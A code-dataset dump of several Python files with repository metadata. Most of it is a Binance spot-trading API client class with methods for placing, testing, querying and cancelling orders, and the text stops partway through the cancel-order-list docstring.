| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
168a0f4de7d08a8c479202ab1b49d83b4b42c038
| 54
|
py
|
Python
|
neuroBN/learning/structure/tree/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | 1
|
2018-09-04T09:32:07.000Z
|
2018-09-04T09:32:07.000Z
|
neuroBN/learning/structure/tree/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | null | null | null |
neuroBN/learning/structure/tree/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | 2
|
2019-10-03T21:23:09.000Z
|
2020-03-21T11:12:56.000Z
|
from neuroBN.learning.structure.tree.chow_liu import *
| 54
| 54
| 0.851852
| 8
| 54
| 5.625
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 54
| 1
| 54
| 54
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
16a8b863cfd29a44e8df814576310ed2f6b733c2
| 1,414
|
py
|
Python
|
marquez_codegen_client/models/__init__.py
|
ashulmanWeWork/marquez-python-client-codegen
|
99f30c78156a5643525dbf6ad4a9ffef329ead10
|
[
"Apache-2.0"
] | null | null | null |
marquez_codegen_client/models/__init__.py
|
ashulmanWeWork/marquez-python-client-codegen
|
99f30c78156a5643525dbf6ad4a9ffef329ead10
|
[
"Apache-2.0"
] | null | null | null |
marquez_codegen_client/models/__init__.py
|
ashulmanWeWork/marquez-python-client-codegen
|
99f30c78156a5643525dbf6ad4a9ffef329ead10
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# flake8: noqa
"""
Marquez
Marquez is an open source **metadata service** for the **collection**, **aggregation**, and **visualization** of a data ecosystem's metadata. # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
# import models into model package
from marquez_codegen_client.models.create_job import CreateJob
from marquez_codegen_client.models.create_job_run import CreateJobRun
from marquez_codegen_client.models.create_namespace import CreateNamespace
from marquez_codegen_client.models.db import DB
from marquez_codegen_client.models.dataset import Dataset
from marquez_codegen_client.models.datasets import Datasets
from marquez_codegen_client.models.iceberg import ICEBERG
from marquez_codegen_client.models.job import Job
from marquez_codegen_client.models.job_run import JobRun
from marquez_codegen_client.models.job_run_id import JobRunId
from marquez_codegen_client.models.job_run_outputs import JobRunOutputs
from marquez_codegen_client.models.job_runs import JobRuns
from marquez_codegen_client.models.job_version import JobVersion
from marquez_codegen_client.models.job_versions import JobVersions
from marquez_codegen_client.models.jobs import Jobs
from marquez_codegen_client.models.namespace import Namespace
from marquez_codegen_client.models.namespaces import Namespaces
| 41.588235
| 159
| 0.847949
| 197
| 1,414
| 5.827411
| 0.340102
| 0.162892
| 0.266551
| 0.355401
| 0.491289
| 0.308362
| 0.162021
| 0
| 0
| 0
| 0
| 0.00627
| 0.097595
| 1,414
| 33
| 160
| 42.848485
| 0.893417
| 0.211457
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
16cf1e4c01abf09d46d1d823b9375411ad41e247
| 213
|
py
|
Python
|
Newbies/hello_world.py
|
Fernal73/LearnPython3
|
5288017c0dbf95633b84f1e6324f00dec6982d36
|
[
"MIT"
] | 1
|
2021-12-17T11:03:13.000Z
|
2021-12-17T11:03:13.000Z
|
Newbies/hello_world.py
|
Fernal73/LearnPython3
|
5288017c0dbf95633b84f1e6324f00dec6982d36
|
[
"MIT"
] | 1
|
2020-02-05T00:14:43.000Z
|
2020-02-06T09:22:49.000Z
|
Newbies/hello_world.py
|
Fernal73/LearnPython3
|
5288017c0dbf95633b84f1e6324f00dec6982d36
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""First program in Python3."""
def main():
"""Print Hello,World."""
print("Hello, World!")
if __name__ == "__main__":
main()
print("Guru99")
print("Hello, World! Again!")
| 13.3125
| 31
| 0.596244
| 26
| 213
| 4.576923
| 0.615385
| 0.252101
| 0.378151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022989
| 0.183099
| 213
| 15
| 32
| 14.2
| 0.66092
| 0.309859
| 0
| 0
| 0
| 0
| 0.345588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0
| 0
| 0.166667
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
16dbb94e3845f902e2c1c3b03fb1870934598209
| 33
|
py
|
Python
|
tests/conftest.py
|
florianeinfalt/cronster
|
c234a50d5234c2c076c7c16430891d94428ea4ab
|
[
"Apache-2.0"
] | null | null | null |
tests/conftest.py
|
florianeinfalt/cronster
|
c234a50d5234c2c076c7c16430891d94428ea4ab
|
[
"Apache-2.0"
] | null | null | null |
tests/conftest.py
|
florianeinfalt/cronster
|
c234a50d5234c2c076c7c16430891d94428ea4ab
|
[
"Apache-2.0"
] | null | null | null |
# cronster py.test configuration
| 16.5
| 32
| 0.818182
| 4
| 33
| 6.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.931034
| 0.909091
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
bc45167efe8bb5142597cdb6d657fa99ee9ccea5
| 47,955
|
py
|
Python
|
app/binance/src/binance/api_calls/client.py
|
DataScienceHobbyGroup/nacho-b
|
e4cfc62f2daa45cb939bb544491cdb1c1a7294ef
|
[
"MIT"
] | null | null | null |
app/binance/src/binance/api_calls/client.py
|
DataScienceHobbyGroup/nacho-b
|
e4cfc62f2daa45cb939bb544491cdb1c1a7294ef
|
[
"MIT"
] | 1
|
2021-04-30T22:09:21.000Z
|
2021-04-30T22:09:21.000Z
|
app/binance/src/binance/api_calls/client.py
|
DataScienceHobbyGroup/nacho-b
|
e4cfc62f2daa45cb939bb544491cdb1c1a7294ef
|
[
"MIT"
] | null | null | null |
"""
Collection of `Spot Account/Trades` APIs.
Date: 2021-05-25
Author: Vitali Lupusor
"""
# Import standard modules
from datetime import date, datetime
from typing import Literal, Optional, Union
# Import local modules
from ..helpers import get, post, delete # type: ignore
from ..helpers.type_literals import ResponseTypeOptions, TypeOptions # type: ignore # noqa: E501
class Trade:
"""Collection of `Spot Account/Trades` APIs."""
def __init__(
self, key: str, secret: str, url: Optional[str] = None
) -> None:
"""
Initialise the class.
Parameters
----------
key (str):
Binance API key.
secret (str):
TODO: Add description.
url (Optional[str]):
Server URL.
"""
self.__key = key
self.__secret = secret
self._url = url
def order(
self,
symbol: str,
side: Literal['BUY', 'SELL'],
type: TypeOptions,
timeInForce, # : Optional[] = None,
quantity: Optional[float] = None,
quoteOrderQty: Optional[float] = None,
price: Optional[float] = None,
newClientOrderId: Optional[str] = None,
stopPrice: Optional[float] = None,
icebergQty: Optional[float] = None,
newOrderRespType: Optional[ResponseTypeOptions] = None,
recvWindow: int = 5000
) -> dict:
"""
Place a new order.
Weight: 1
Data Source: Matching Engine
Other info
----------
`LIMIT_MAKER` are `LIMIT` orders that will be rejected, if they
would immediately match and trade as a taker.
`STOP_LOSS` and `TAKE_PROFIT` will execute a `MARKET` order
when the `stopPrice` is reached.
Any `LIMIT` or `LIMIT_MAKER` type order can be made an iceberg
order by sending an `icebergQty`.
Any order with an `icebergQty` MUST have `timeInForce` set to
`GTC`.
`MARKET` orders using the quantity field specifies the amount of
the base asset the user wants to buy or sell at the market price.
For example, sending a `MARKET` order on BTCUSDT will specify how
much BTC the user is buying or selling.
`MARKET` orders using `quoteOrderQty` specifies the amount the
user wants to spend (when buying) or receive (when selling) the
quote asset; the correct quantity will be determined based on the
market liquidity and `quoteOrderQty`.
Using BTCUSDT as an example:
On the BUY side, the order will buy as many BTC as
`quoteOrderQty` USDT can.
On the SELL side, the order will sell as much BTC needed to receive
`quoteOrderQty` USDT.
`MARKET` orders using `quoteOrderQty` will not break
`LOT_SIZE` filter rules; the order will execute a quantity that
will have the notional value as close as possible to
`quoteOrderQty`.
Same `newClientOrderId` can be accepted only when the previous
one is filled, otherwise the order will be rejected.
Trigger order price rules against market price for both `MARKET`
and `LIMIT` versions:
Price above market price: STOP_LOSS -> BUY, TAKE_PROFIT -> SELL
Price below market price: STOP_LOSS -> SELL, TAKE_PROFIT -> BUY
Parameters
----------
symbol (str):
TODO: Add description.
side (Literal['BUY', 'SELL']):
TODO: Add description.
type (TypeOptions):
TODO: Add description.
timeInForce (Optional[TODO]):
TODO: Add description.
Requred, if `type` in [
`LIMIT`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT_LIMIT`
].
Defaults to `None`.
quantity (Optional[float]):
TODO: It appears to be mandatory, but the documentation says
otherwise. Check it!
Requred, if `type` in [
`LIMIT`, `MARKET`, `STOP_LOSS`, `STOP_LOSS_LIMIT`,
`TAKE_PROFIT`, `TAKE_PROFIT_LIMIT`, `LIMIT_MAKER`
].
Defaults to `None`.
quoteOrderQty (Optional[float]):
TODO: Add description.
Requred, if `type` == `MARKET`.
Defaults to `None`.
price (Optional[float]):
TODO: Add description.
Requred, if `type` in [
`LIMIT`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT_LIMIT`,
`LIMIT_MAKER`
].
Defaults to `None`.
newClientOrderId (Optional[str]):
A unique id among open orders. Automatically generated, if not
sent.
TODO: Understand what the poet was trying to say and rephrase
it.
stopPrice (Optional[float]):
Required, if `type` in [
`STOP_LOSS`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT`,
`TAKE_PROFIT_LIMIT`
]
Defaults to `None`.
icebergQty (Optional[float]):
Used with LIMIT, STOP_LOSS_LIMIT, and TAKE_PROFIT_LIMIT to
create an iceberg order.
Defaults to `None`.
newOrderRespType (Optional[TODO]):
Set the response JSON. ACK, RESULT, or FULL; MARKET and LIMIT
order types default to FULL, all other orders default to ACK.
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than 60000.
Defaults to 5000.
Returns
-------
(dict):
TODO: Add description.
"""
_timeInForce = timeInForce.upper() if timeInForce else None
return post(
self._url, 'order', self.__key, self.__secret,
symbol=symbol.upper(), side=side.upper(), type=type.upper(),
timeInForce=_timeInForce, quantity=quantity,
quoteOrderQty=quoteOrderQty, newClientOrderId=newClientOrderId,
price=price, stopPrice=stopPrice, icebergQty=icebergQty,
newOrderRespType=newOrderRespType, recvWindow=recvWindow
)
def testOrder(
self,
symbol: str,
side: Literal['BUY', 'SELL'],
type: TypeOptions,
timeInForce=None, # : Optional[] = None,
quantity: Optional[float] = None,
quoteOrderQty: Optional[float] = None,
price: Optional[float] = None,
newClientOrderId: Optional[str] = None,
stopPrice: Optional[float] = None,
icebergQty: Optional[float] = None,
newOrderRespType: Optional[ResponseTypeOptions] = None,
recvWindow: int = 5000
) -> dict:
"""
Place a new order.
Weight: 1
Data Source: Matching Engine
Other info
----------
`LIMIT_MAKER` are `LIMIT` orders that will be rejected, if they
would immediately match and trade as a taker.
`STOP_LOSS` and `TAKE_PROFIT` will execute a `MARKET` order
when the `stopPrice` is reached.
Any `LIMIT` or `LIMIT_MAKER` type order can be made an iceberg
order by sending an `icebergQty`.
Any order with an `icebergQty` MUST have `timeInForce` set to
`GTC`.
`MARKET` orders using the quantity field specifies the amount of
the base asset the user wants to buy or sell at the market price.
For example, sending a `MARKET` order on BTCUSDT will specify how
much BTC the user is buying or selling.
`MARKET` orders using `quoteOrderQty` specifies the amount the
user wants to spend (when buying) or receive (when selling) the
quote asset; the correct quantity will be determined based on the
market liquidity and `quoteOrderQty`.
Using BTCUSDT as an example:
On the BUY side, the order will buy as many BTC as
`quoteOrderQty` USDT can.
On the SELL side, the order will sell as much BTC needed to receive
`quoteOrderQty` USDT.
`MARKET` orders using `quoteOrderQty` will not break
`LOT_SIZE` filter rules; the order will execute a quantity that
will have the notional value as close as possible to
`quoteOrderQty`.
Same `newClientOrderId` can be accepted only when the previous
one is filled, otherwise the order will be rejected.
Trigger order price rules against market price for both `MARKET`
and `LIMIT` versions:
Price above market price: STOP_LOSS -> BUY, TAKE_PROFIT -> SELL
Price below market price: STOP_LOSS -> SELL, TAKE_PROFIT -> BUY
Parameters
----------
symbol (str):
TODO: Add description.
side (Literal['BUY', 'SELL']):
TODO: Add description.
type (TypeOptions):
TODO: Add description.
timeInForce (Optional[TODO]):
TODO: Add description.
Requred, if `type` in [
`LIMIT`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT_LIMIT`
].
Defaults to `None`.
quantity (Optional[float]):
TODO: It appears to be mandatory, but the documentation says
otherwise. Check it!
Requred, if `type` in [
`LIMIT`, `MARKET`, `STOP_LOSS`, `STOP_LOSS_LIMIT`,
`TAKE_PROFIT`, `TAKE_PROFIT_LIMIT`, `LIMIT_MAKER`
].
Defaults to `None`.
quoteOrderQty (Optional[float]):
TODO: Add description.
Requred, if `type` == `MARKET`.
Defaults to `None`.
price (Optional[float]):
TODO: Add description.
Requred, if `type` in [
`LIMIT`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT_LIMIT`,
`LIMIT_MAKER`
].
Defaults to `None`.
newClientOrderId (Optional[str]):
A unique id among open orders. Automatically generated, if not
sent.
TODO: Understand what the poet was trying to say and rephrase
it.
stopPrice (Optional[float]):
Required, if `type` in [
`STOP_LOSS`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT`,
`TAKE_PROFIT_LIMIT`
]
Defaults to `None`.
icebergQty (Optional[float]):
Used with LIMIT, STOP_LOSS_LIMIT, and TAKE_PROFIT_LIMIT to
create an iceberg order.
Defaults to `None`.
newOrderRespType (Optional[TODO]):
Set the response JSON. ACK, RESULT, or FULL; MARKET and LIMIT
order types default to FULL, all other orders default to ACK.
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than 60000.
Defaults to 5000.
Returns
-------
(dict)
An empty dictionary (`{}`) in case of success.
Raises
------
requests.exceptions.RequestException
If incorrect parameters provided.
"""
_timeInForce = timeInForce.upper() if timeInForce else None
return post(
self._url, 'order/test', key=self.__key, secret=self.__secret,
symbol=symbol.upper(), side=side.upper(), type=type.upper(),
timeInForce=_timeInForce, quantity=quantity,
quoteOrderQty=quoteOrderQty, newClientOrderId=newClientOrderId,
price=price, stopPrice=stopPrice, icebergQty=icebergQty,
newOrderRespType=newOrderRespType, recvWindow=recvWindow
)
def myTrades(
self,
symbol: str,
startTime: Optional[Union[str, date, datetime]] = None,
endTime: Optional[Union[str, date, datetime]] = None,
fromId: Optional[float] = None,
limit: Optional[int] = None,
recvWindow: int = 5000
) -> dict:
"""
Get trades for a specific account and symbol.
Weight: 10
Data Source: Database
Other info
----------
`fromId` TradeId to fetch from. Default gets most recent trades.
If `fromId` is set, it will get `id` >= the `fromId`.
Otherwise most recent trades are returned.
`limit` Default 500; max 1000.
`recvWindow` The value cannot be greater than `60000`
Parameters
----------
symbol (str):
Mandatory: Currency symbol of interest.
Example: `BTCUSDT` for Bitcoin vs Tether
(US dollar stablecoin)
startTime (Optional[Union[str, date, datetime]]):
TODO: confirm if time is expressed in ms
Optional: The point in history to get data from.
endTime (Optional[Union[str, date, datetime]]):
TODO: confirm if time is expressed in ms
Optional: The point in history to get data to.
fromId (Optional[int]):
Optional: The trade id to in which to get data from.
limit (Optional[int]):
Optional: The number of trades to get starting from
now - `limit`
Example: if `limit` is set to 10 the API will return
the 10 previous trades.
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than `60000`.
Defaults to `5000`.
Returns
-------
(List[dict])
A list of all trades within a given range if set or the past X
number of trades either specified or defaulted to `5000`.
[
{
'symbol': 'BTCUSDT',
'id': 675286,
'orderId': 2518667,
'orderListId': -1,
'price': '50000.00000000',
'qty': '0.00019700',
'quoteQty': '9.85000000',
'commission': '0.00000000',
'commissionAsset': 'USDT',
'time': 1621011870116,
'isBuyer': False,
'isMaker': True,
'isBestMatch': True
}
]
"""
return get(
self._url, 'myTrades', key=self.__key, secret=self.__secret,
symbol=symbol.upper(), startTime=startTime, endTime=endTime,
fromId=fromId, limit=limit, recvWindow=recvWindow
)
def cancelOrder(
self,
symbol: str,
orderId: Optional[int] = None,
origClientOrderId: Optional[str] = None,
newClientOrderId: Optional[float] = None,
recvWindow: int = 5000
) -> dict:
"""
Cancel an active order.
Weight: 1
Data Source: Matching Engine
Other info
----------
Either `orderId` or `origClientOrderId` must be sent.
Parameters
----------
symbol (str):
Currency symbol.
orderId (int):
Specified when cancelling a specific order. Corresponds with
the open order to be cancelled.
origClientOrderId (str):
When the order is created a clientOrderId is generated if
not specified. This is equivelant to origClientOrderId and
can be used in this parameter
newClientOrderId (str):
Used to uniquely identify this cancel. Automatically generated
by default.
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(dict):
Information regarding the cancelled order:-
{
'symbol': 'BTCUSDT',
'origClientOrderId': 'ux4BADmI0BopccaWjvU0r9',
'orderId': 4740711,
'orderListId': -1,
'clientOrderId': 'GmC4kcQCc2t4PAV6wbbpT5',
'price': '30000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'CANCELED',
'timeInForce': 'GTC',
'type': 'LIMIT',
'side': 'BUY'
}
"""
return delete(
self._url, 'order',
key=self.__key,
secret=self.__secret,
symbol=symbol.upper(),
orderId=orderId,
origClientOrderId=origClientOrderId,
newClientOrderId=newClientOrderId,
recvWindow=recvWindow
)
def cancelAllOpenOrders(
self,
symbol: str,
recvWindow: int = 5000
) -> dict:
"""
Cancel all active orders on a symbol.
This includes OCO orders.
Weight: 1
Data Source: Matching Engine
Other info
----------
Given a symbol, all open orders related to it will cancel.
Parameters
----------
symbol (str):
Currency symbol.
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(List[dict])
Information confirming the cancellation of each trade that was
open and the details of each trade.
[
{
'symbol': 'BTCUSDT',
'origClientOrderId': '6uZQaihpXuvhgoICkKv6kI',
'orderId': 4723160,
'orderListId': -1,
'clientOrderId': 'RH5lwa40NhLe0ibLTz0ydv',
'price': '30000.00000000',
'origQty': '1.00000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'CANCELED',
'timeInForce': 'GTC',
'type': 'LIMIT',
'side': 'BUY'
}
]
"""
return delete(
self._url, 'openOrders',
key=self.__key,
secret=self.__secret,
symbol=symbol.upper(),
recvWindow=recvWindow
)
def queryOrder(
    self,
    symbol: str,
    orderId: Optional[int] = None,
    origClientOrderId: Optional[str] = None,
    recvWindow: int = 5000
) -> dict:
    """
    Check an order's status.
    Weight: 2
    Data Source: Database
    Other info
    ----------
    Either `orderId` or `origClientOrderId` must be sent.
    For some historical orders `cummulativeQuoteQty` will be < 0,
    meaning the data is not available at this time.
    Parameters
    ----------
    symbol (str):
        Currency symbol.
    orderId (Optional[int]):
        Exchange-assigned id of the order to query.
    origClientOrderId (Optional[str]):
        Client id of the order to query. When the order is created a
        clientOrderId is generated if not specified; it is equivalent
        to origClientOrderId and can be used in this parameter.
    recvWindow (int):
        Number of milliseconds in which to complete the transaction.
        If timeout, transaction is being cancelled.
        Defaults to 5000.
    Returns
    -------
    (dict)
        Information regarding the order that was queried, e.g.:-
        {
            'symbol': 'BTCUSDT',
            'orderId': 4740711,
            'orderListId': -1,
            'clientOrderId': 'ux4BADmI0BopccaWjvU0r9',
            'price': '30000.00000000',
            'origQty': '0.01000000',
            'executedQty': '0.00000000',
            'cummulativeQuoteQty': '0.00000000',
            'status': 'NEW',
            'timeInForce': 'GTC',
            'type': 'LIMIT',
            'side': 'BUY',
            'stopPrice': '0.00000000',
            'icebergQty': '0.00000000',
            'time': 1622039616234,
            'updateTime': 1622039616234,
            'isWorking': True,
            'origQuoteOrderQty': '0.00000000'
        }
    """
    return get(
        self._url, 'order',
        key=self.__key,
        secret=self.__secret,
        symbol=symbol.upper(),
        orderId=orderId,
        origClientOrderId=origClientOrderId,
        recvWindow=recvWindow
    )
def openOrders(
    self,
    symbol: Optional[str] = None,
    recvWindow: int = 5000
) -> dict:
    """
    Get all open orders on a symbol.
    Careful when accessing this with no symbol.
    Weight: 3 for a single symbol; 40 when the symbol parameter is omitted
    Data Source: Database
    Other info
    ----------
    If the `symbol` is not sent, orders for all symbols
    will be returned in an array.
    Parameters
    ----------
    symbol (Optional[str]):
        Currency symbol. Defaults to None, which returns open orders
        for every symbol (at a much higher request weight).
    recvWindow (int):
        Number of milliseconds in which to complete the transaction.
        If timeout, transaction is being cancelled.
        Defaults to 5000.
    Returns
    -------
    (List[dict])
        A list of all open orders for a given symbol or all open orders,
        if no symbol is specified (see cautionary note), e.g.:-
        [
            {
                'symbol': 'BTCUSDT',
                'orderId': 4759918,
                'orderListId': -1,
                'clientOrderId': 'iXfVYUhccMcTNnl01TvW3Q',
                'price': '30000.00000000',
                'origQty': '0.01000000',
                'executedQty': '0.00000000',
                'cummulativeQuoteQty': '0.00000000',
                'status': 'NEW',
                'timeInForce': 'GTC',
                'type': 'LIMIT',
                'side': 'BUY',
                'stopPrice': '0.00000000',
                'icebergQty': '0.00000000',
                'time': 1622045634930,
                'updateTime': 1622045634930,
                'isWorking': True,
                'origQuoteOrderQty': '0.00000000'
            }
        ]
    """
    # `= None` default added: the annotation was already Optional and the
    # body/doc support omitting the symbol; callers may now leave it out.
    return get(
        self._url, 'openOrders',
        key=self.__key,
        secret=self.__secret,
        symbol=symbol.upper() if symbol else None,
        recvWindow=recvWindow
    )
def allOrders(
    self,
    symbol: str,
    orderId: Optional[int] = None,
    startTime: Optional[Union[str, date, datetime]] = None,
    endTime: Optional[Union[str, date, datetime]] = None,
    limit: Optional[int] = None,
    recvWindow: int = 5000
) -> dict:
    """
    Get all account orders; active, canceled, or filled.
    Weight: 10 with symbol
    Data Source: Database
    Other info
    ----------
    If `orderId` is set, it will get orders >= that `orderId`.
    Otherwise most recent orders are returned.
    For some historical orders `cummulativeQuoteQty` will be < 0,
    meaning the data is not available at this time.
    If `startTime` and/or `endTime` provided, `orderId` is not
    required.
    Parameters
    ----------
    symbol (str):
        Currency symbol.
    orderId (Optional[int]):
        If set, orders with an id >= `orderId` are returned;
        otherwise the most recent orders are returned.
    startTime (Optional[Union[str, date, datetime]]):
        TODO: confirm if time is expressed in ms
        Optional: The point in history to get data from.
    endTime (Optional[Union[str, date, datetime]]):
        TODO: confirm if time is expressed in ms
        Optional: The point in history to get data to.
    limit (Optional[int]):
        Optional: The number of trades to get starting from
        now - `limit`
        Example: if `limit` is set to 10 the API will return
        the 10 previous trades.
    recvWindow (int):
        Number of milliseconds in which to complete the transaction.
        If timeout, transaction is being cancelled.
        Defaults to 5000.
    Returns
    -------
    (List[dict])
        A list of all orders for a given symbol, e.g.:-
        [
            {
                'symbol': 'BTCUSDT',
                'orderId': 4759918,
                'orderListId': -1,
                'clientOrderId': 'iXfVYUhccMcTNnl01TvW3Q',
                'price': '30000.00000000',
                'origQty': '0.01000000',
                'executedQty': '0.00000000',
                'cummulativeQuoteQty': '0.00000000',
                'status': 'NEW',
                'timeInForce': 'GTC',
                'type': 'LIMIT',
                'side': 'BUY',
                'stopPrice': '0.00000000',
                'icebergQty': '0.00000000',
                'time': 1622045634930,
                'updateTime': 1622045634930,
                'isWorking': True,
                'origQuoteOrderQty': '0.00000000'
            }
        ]
    """
    return get(
        self._url,
        'allOrders',
        key=self.__key,
        secret=self.__secret,
        symbol=symbol.upper(),
        orderId=orderId,
        startTime=startTime,
        endTime=endTime,
        limit=limit,
        recvWindow=recvWindow
    )
def account(
    self,
    recvWindow: int = 5000
) -> dict:
    """
    Get current account information.
    Weight: 10
    Data Source: Memory => Database
    Parameters
    ----------
    recvWindow (int):
        Time window in milliseconds to execute the order.
        The value cannot be greater than `60000`.
        Defaults to `5000`.
    Returns
    -------
    (dict)
        Current account information (presumably balances, trading
        permissions and commission rates -- the previous docstring
        showed a trade-list payload that belongs to a different
        endpoint; verify the exact shape against the exchange docs).
    """
    return get(
        self._url,
        'account',
        key=self.__key,
        secret=self.__secret,
        recvWindow=recvWindow
    )
def oco(
    self,
    symbol: str,
    side: Literal['BUY', 'SELL'],
    quantity: float,
    price: float,
    stopPrice: float,
    listClientOrderId: Optional[str] = None,
    limitClientOrderId: Optional[str] = None,
    limitIcebergQty: Optional[float] = None,
    stopClientOrderId: Optional[str] = None,
    stopLimitPrice: Optional[float] = None,
    stopIcebergQty: Optional[float] = None,
    stopLimitTimeInForce: Optional[Literal['GTC', 'FOK', 'IOC']] = None,
    newOrderRespType: Optional[ResponseTypeOptions] = None,
    recvWindow: int = 5000
) -> dict:
    """
    Send in a new OCO (one-cancels-the-other) order.
    Weight: 1
    Data Source: Matching Engine
    Other info
    ----------
    Price Restrictions:
        SELL: Limit Price > Last Price > Stop Price
        BUY: Limit Price < Last Price < Stop Price
    Quantity Restrictions:
        Both legs must have the same quantity.
        ICEBERG quantities however do not have to be the same.
    Order Rate Limit:
        OCO counts as 2 orders against the order rate limit.
    Parameters
    ----------
    symbol (str):
        Currency symbol.
    side (Literal['BUY', 'SELL']):
        Whether the position is long/buy or short/sell.
    quantity (float):
        The quantity of the asset to buy.
    price (float):
        The price of which to buy an asset at (see the price
        restrictions above).
    stopPrice (float):
        When the price falls to this level a market order is created to
        essentially close the position due to the trade going against
        the intended side.
    listClientOrderId (Optional[str]):
        A unique Id for the entire orderList.
    limitClientOrderId (Optional[str]):
        A unique Id for the limit order.
    limitIcebergQty (Optional[float]):
        Iceberg quantity for the limit leg.
    stopClientOrderId (Optional[str]):
        A unique Id for the stop loss/stop loss limit leg.
    stopLimitPrice (Optional[float]):
        When the price falls to this level a limit order is created to
        essentially close the position at the specified price, usually
        used to avoid gapping past the stopPrice. If provided,
        `stopLimitTimeInForce` is required.
    stopIcebergQty (Optional[float]):
        Used with LIMIT, STOP_LOSS_LIMIT, and TAKE_PROFIT_LIMIT to
        create an iceberg order. Defaults to `None`.
    stopLimitTimeInForce (Optional[Literal['GTC', 'FOK', 'IOC']]):
        Must be passed when using `stopLimitPrice`. Valid values:
        GTC (Good Till Canceled), IOC (Immediate Or Cancel),
        FOK (Fill or Kill).
    newOrderRespType (Optional[ResponseTypeOptions]):
        Set the response JSON. ACK, RESULT, or FULL; MARKET and LIMIT
        order types default to FULL, all other orders default to ACK.
    recvWindow (int):
        Time window in milliseconds to execute the order.
        The value cannot be greater than `60000`.
        Defaults to `5000`.
    Returns
    -------
    (Dict[str, List[dict]])
        Information related to the overall OCO order (orderListId,
        contingencyType, list status fields, transactionTime, symbol),
        an `orders` list naming each leg, and an `orderReports` list
        detailing each leg's price/quantity/status.
    """
    return post(
        self._url,
        'order/oco',
        key=self.__key,
        secret=self.__secret,
        # Upper-cased for consistency: every other endpoint in this
        # class normalises the symbol with `.upper()`.
        symbol=symbol.upper(),
        side=side,
        quantity=quantity,
        price=price,
        stopPrice=stopPrice,
        listClientOrderId=listClientOrderId,
        limitClientOrderId=limitClientOrderId,
        limitIcebergQty=limitIcebergQty,
        stopClientOrderId=stopClientOrderId,
        stopLimitPrice=stopLimitPrice,
        stopIcebergQty=stopIcebergQty,
        stopLimitTimeInForce=stopLimitTimeInForce,
        newOrderRespType=newOrderRespType,
        recvWindow=recvWindow
    )
def cancelOrderList(
    self,
    symbol: str,
    orderListId: Optional[float] = None,
    listClientOrderId: Optional[str] = None,
    newClientOrderId: Optional[str] = None,
    recvWindow: int = 5000
) -> dict:
    """
    Cancel an entire Order List.
    Weight: 1
    Data Source: Matching Engine
    Other info
    ----------
    Canceling an individual leg will cancel the entire OCO.
    Either `orderListId` or `listClientOrderId` must be provided.
    `newClientOrderId` is used to uniquely identify this cancel,
    automatically generated by default.
    Parameters
    ----------
    symbol (str):
        Currency symbol.
